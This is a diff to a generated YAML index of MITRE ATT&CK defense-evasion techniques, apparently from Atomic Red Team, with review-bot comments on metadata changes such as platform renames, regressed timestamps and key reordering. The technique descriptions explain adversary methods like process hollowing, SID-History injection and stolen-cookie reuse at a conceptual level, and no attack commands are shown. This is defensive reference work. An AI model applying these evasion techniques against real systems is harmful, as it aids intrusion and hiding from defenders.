name: Indicator Removal from Tools
x_mitre_detection: The first detection of a malicious tool may trigger an anti-virus
@@ -12648,11 +12737,10 @@ defense-evasion:
- Signature-based detection
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -12669,7 +12757,6 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -12679,7 +12766,7 @@ defense-evasion:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -12688,19 +12775,17 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
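Review bot: `Azure AD`, `Office 365` and `Google Workspace` are dropped from `x_mitre_platforms` in favour of `Office Suite` and `Identity Provider` (with `x_mitre_version` 2.6 to 2.7), so any per-platform index or filter generated from this field will silently lose T1078 under the three retired platform names. Check that generated indexes are regenerated in the same change and that any test metadata still keyed on the old names maps onto the new ones; the `x_mitre_modified_by_ref` removed here should reappear later in the object, as it does for the other techniques.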
@@ -12748,11 +12833,12 @@ defense-evasion:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.012:
technique:
- modified: '2023-08-11T21:37:00.009Z'
+ modified: '2024-09-12T15:11:45.602Z'
name: 'Process Injection: Process Hollowing'
description: "Adversaries may inject malicious code into suspended and hollowed
processes in order to evade process-based defenses. Process hollowing is a
@@ -12820,18 +12906,17 @@ defense-evasion:
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- source_name: Leitch Hollowing
- description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
- 2014.
- url: http://www.autosectools.com/process-hollowing.pdf
+ description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+ 2024.
+ url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
- source_name: Mandiant Endpoint Evading 2019
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.012
atomic_tests: []
T1564.009:
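Review bot: the `Leitch Hollowing` reference now points at a third-party mirror (`new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf`) instead of `autosectools.com`, with the retrieval date moved to September 12, 2024. If the original host is gone, confirm the mirrored PDF is the same paper before accepting the swap, and consider recording an archived copy alongside it so the reference does not rot a second time.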
@@ -12878,7 +12963,7 @@ defense-evasion:
Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using ls -l@
or xattr -l
commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the /Resources
folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)
Adversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:10:23.890Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Resource Forking
x_mitre_detection: "Identify files with the com.apple.ResourceFork
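Review bot: the `modified` timestamp for Resource Forking goes backwards, from `2022-05-24T14:00:00.188Z` to `2022-05-05T05:10:23.890Z`, and the same regression appears further down for Invalid Code Signature, Run Virtual Instance, SID-History Injection, Network Boundary Bridging, Elevated Execution with Prompt, Regsvr32, Path Interception by Unquoted Path, Regsvcs/Regasm, VBA Stomping and BITS Jobs. Every old value ends in `14:00:00.188Z`, which looks like a release-wide stamp, whereas the new values are earlier and carry millisecond precision, so the generator is evidently reading a different upstream bundle; any consumer that treats `modified` as monotonic to detect changed techniques will miss these, so the source switch belongs in the PR description.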
@@ -12900,7 +12985,6 @@ defense-evasion:
- Gatekeeper
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027:
technique:
@@ -12975,6 +13059,7 @@ defense-evasion:
- 'Script: Script Execution'
- 'File: File Creation'
- 'Module: Module Load'
+ - 'Application Log: Application Log Content'
- 'Command: Command Execution'
- 'File: File Metadata'
- 'Process: OS API Execution'
@@ -13034,7 +13119,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1027
atomic_tests:
- name: Decode base64 Data into Script
@@ -13072,7 +13156,7 @@ defense-evasion:
name: sh
T1556.006:
technique:
- modified: '2024-04-16T00:20:21.488Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication
description: "Adversaries may disable or modify multi-factor authentication
(MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -13101,24 +13185,26 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
- Muhammad Moiz Arshad, @5T34L7H
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Linux
- macOS
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
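Review bot: in the T1556.006 platform list, `Azure AD`, `Office 365` and `Google Workspace` are removed and `Office Suite` and `Identity Provider` are added (version 1.2 to 1.3), so any per-platform filtering of this index that still matches on the old platform names will no longer find this technique; check that the platform-specific index generation handles the new names. The same hunk also relocates `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` from the bottom of the object (where the next hunk removes them) to the middle, which is pure key reordering; emitting keys in a fixed order would keep future diffs to substantive changes.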
@@ -13153,9 +13239,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.001:
technique:
@@ -13178,7 +13261,7 @@ defense-evasion:
url: https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/
description: Vest, J. (2017, October 9). Borrowing Microsoft MetaData and
Signatures to Hide Binary Payloads. Retrieved September 10, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-02-10T19:52:47.724Z'
name: Invalid Code Signature
description: |-
Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)
@@ -13196,8 +13279,6 @@ defense-evasion:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'File: File Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1564.006:
technique:
@@ -13236,7 +13317,7 @@ defense-evasion:
description: Johann Rehberger. (2020, September 23). Beware of the Shadowbunny
- Using virtual machines to persist and evade detections. Retrieved September
22, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-14T22:21:59.708Z'
name: Run Virtual Instance
description: |-
Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
@@ -13279,10 +13360,78 @@ defense-evasion:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1564.006
atomic_tests: []
+ T1027.014:
+ technique:
+ modified: '2024-10-09T18:56:28.092Z'
+ name: Polymorphic Code
+ description: "Adversaries may utilize polymorphic code (also known as metamorphic
+ or mutating code) to evade detection. Polymorphic code is a type of software
+ capable of changing its runtime footprint during code execution.(Citation:
+ polymorphic-blackberry) With each execution of the software, the code is mutated
+ into a different version of itself that achieves the same purpose or objective
+ as the original. This functionality enables the malware to evade traditional
+ signature-based defenses, such as antivirus and antimalware tools.(Citation:
+ polymorphic-sentinelone) \nOther obfuscation techniques can be used in conjunction
+ with polymorphic code to accomplish the intended effects, including using
+ mutation engines to conduct actions such as [Software Packing](https://attack.mitre.org/techniques/T1027/002),
+ [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010), or [Encrypted/Encoded
+ File](https://attack.mitre.org/techniques/T1027/013).(Citation: polymorphic-linkedin)(Citation:
+ polymorphic-medium)\n"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Ye Yint Min Thu Htut, Active Defense Team, DBS Bank
+ - TruKno
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Application Log: Application Log Content'
+ - 'File: File Creation'
+ - 'File: File Metadata'
+ x_mitre_defense_bypassed:
+ - Signature-based Detection
+ type: attack-pattern
+ id: attack-pattern--b577dfc1-0177-4522-8d5a-782127c8592b
+ created: '2024-09-27T12:28:03.938Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1027/014
+ external_id: T1027.014
+ - source_name: polymorphic-blackberry
+ description: Blackberry. (n.d.). What is Polymorphic Malware?. Retrieved September
+ 27, 2024.
+ url: https://www.blackberry.com/us/en/solutions/endpoint-security/ransomware-protection/polymorphic-malware
+ - source_name: polymorphic-sentinelone
+ description: SentinelOne. (2023, March 18). What is Polymorphic Malware? Examples
+ and Challenges. Retrieved September 27, 2024.
+ url: https://www.sentinelone.com/cybersecurity-101/threat-intelligence/what-is-polymorphic-malware
+ - source_name: polymorphic-medium
+ description: 'Shellseekercyber. (2024, January 7). Explainer: Packed Malware.
+ Retrieved September 27, 2024.'
+ url: https://medium.com/@shellseekerscyber/explainer-packed-malware-16f09cc75035
+ - source_name: polymorphic-linkedin
+ description: 'Sherwin Akshay. (2024, May 28). Techniques for concealing malware
+ and hindering analysis: Packing up and unpacking stuff. Retrieved September
+ 27, 2024.'
+ url: https://www.linkedin.com/pulse/techniques-concealing-malware-hindering-analysis-packing-akshay-unijc
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1134.005:
technique:
x_mitre_platforms:
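Review bot: the new T1027.014 (Polymorphic Code) entry has no `identifier:` key before its `atomic_tests: []`, whereas T1564.006 directly above it, and T1055.012 and T1218.010 elsewhere in this diff, carry `identifier: <id>` with the same empty test list; if `identifier` is meant to be present for every technique, the new-technique path in the generator is missing it, and if it is only emitted for techniques with an atomics directory, a comment in the generator would spare the next reviewer the same question. Minor: the description inherits a stray space before `\nOther obfuscation techniques` from upstream, which is not worth hand-editing in generated output.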
@@ -13326,7 +13475,7 @@ defense-evasion:
description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
30, 2017.
source_name: Microsoft DsAddSidHistory
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:49:58.414Z'
name: 'Access Token Manipulation: SID-History Injection'
description: |-
Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -13351,8 +13500,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1134.005
atomic_tests: []
T1599:
@@ -13383,7 +13530,7 @@ defense-evasion:
Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.
When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021) In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:05:44.200Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Network Boundary Bridging
x_mitre_detection: |-
@@ -13402,7 +13549,6 @@ defense-evasion:
- System Access Controls
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1553:
technique:
@@ -13497,11 +13643,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1548.004:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T16:35:18.492Z'
name: Elevated Execution with Prompt
description: "Adversaries may leverage the AuthorizationExecuteWithPrivileges
API to escalate privileges by prompting the user for credentials.(Citation:
@@ -13581,11 +13726,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:24:56.148Z'
name: 'Signed Binary Proxy Execution: Regsvr32'
description: |-
Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32)
@@ -13650,12 +13794,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.010
atomic_tests: []
T1036.003:
technique:
- modified: '2023-09-14T21:12:48.411Z'
+ modified: '2024-09-12T19:30:45.065Z'
name: 'Masquerading: Rename System Utilities'
description: 'Adversaries may rename legitimate system utilities to try to evade
security mechanisms concerning the usage of those utilities. Security monitoring
@@ -13704,8 +13847,8 @@ defense-evasion:
external_id: T1036.003
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
- Retrieved April 22, 2019.
- url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Elastic Masquerade Ball
description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
Retrieved October 31, 2016.'
@@ -13720,9 +13863,8 @@ defense-evasion:
url: https://lolbas-project.github.io/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036.003
atomic_tests:
- name: Masquerading as FreeBSD or Linux crond process.
@@ -13743,7 +13885,7 @@ defense-evasion:
name: sh
T1562.011:
technique:
- modified: '2023-04-12T22:46:33.995Z'
+ modified: '2024-10-16T20:12:44.962Z'
name: Spoof Security Alerting
description: |-
Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.
@@ -13755,7 +13897,7 @@ defense-evasion:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -13785,13 +13927,12 @@ defense-evasion:
url: https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:35.788Z'
name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
description: |-
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -13852,7 +13993,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.009
atomic_tests: []
T1027.003:
@@ -13908,11 +14048,10 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1550.004:
technique:
- modified: '2023-09-19T21:26:24.725Z'
+ modified: '2024-10-15T16:11:15.657Z'
name: Web Session Cookie
description: |-
Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -13936,11 +14075,10 @@ defense-evasion:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Web Credential: Web Credential Usage'
@@ -13965,9 +14103,8 @@ defense-evasion:
url: https://wunderwuzzi23.github.io/blog/passthecookie.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.002:
technique:
@@ -14047,7 +14184,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.009:
technique:
@@ -14081,7 +14217,7 @@ defense-evasion:
- source_name: LOLBAS Regasm
url: https://lolbas-project.github.io/lolbas/Binaries/Regasm/
description: LOLBAS. (n.d.). Regasm.exe. Retrieved July 31, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:55:48.725Z'
name: 'Signed Binary Proxy Execution: Regsvcs/Regasm'
description: |-
Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
@@ -14108,8 +14244,6 @@ defense-evasion:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.009
atomic_tests: []
T1553.004:
@@ -14204,7 +14338,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.004
atomic_tests:
- name: Install root CA on CentOS/RHEL
@@ -14296,43 +14429,20 @@ defense-evasion:
elevation_required: true
T1027.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
- type: attack-pattern
- created: '2020-03-16T15:30:57.711Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1027.004
- url: https://attack.mitre.org/techniques/T1027/004
- - description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
- in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
- campaign. Retrieved November 29, 2018.'
- url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
- source_name: ClearSky MuddyWater Nov 2018
- - source_name: TrendMicro WindowsAppMac
- url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
- description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
- Info Stealer and Adware. Retrieved April 25, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-10-03T17:43:14.766Z'
name: 'Obfuscated Files or Information: Compile After Delivery'
description: |-
- Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
+ Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as ilasm.exe(Citation: ATTACK IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Praetorian
+ - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
+ - Liran Ravich, CardinalOps
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor the execution file paths and command-line arguments
for common compilers, such as csc.exe and GCC/MinGW, and correlate with other
suspicious behavior to reduce false positives from normal user and administrator
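Review bot: the updated T1027.004 description adds `ilasm.exe(Citation: ATTACK IQ)` (missing space before the citation, inherited from upstream) as a native compiler, but the `x_mitre_detection` context lines still read `for common compilers, such as csc.exe and GCC/MinGW`, so the detection guidance lags the description; anyone building path or command-line monitoring from this field should add ilasm.exe alongside csc.exe. The block of `x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`/`type`/`created` and `external_references` removed at the top of this hunk reappears lower in the object in the following hunks, turning a one-sentence content change plus one new contributor (Liran Ravich, CardinalOps) into a near-total rewrite of the object; stable key ordering in the generator would avoid that.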
@@ -14341,9 +14451,14 @@ defense-evasion:
and execution frameworks like Mono and determine if they have a legitimate
purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these
should only be used in specific and limited cases, like for software development.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Creation'
@@ -14355,12 +14470,35 @@ defense-evasion:
- Anti-virus
- Binary Analysis
- Static File Analysis
- x_mitre_permissions_required:
- - User
x_mitre_system_requirements:
- Compiler software (either native to the system or delivered by the adversary)
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
+ created: '2020-03-16T15:30:57.711Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1027/004
+ external_id: T1027.004
+ - source_name: ClearSky MuddyWater Nov 2018
+ description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
+ in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
+ campaign. Retrieved November 29, 2018.'
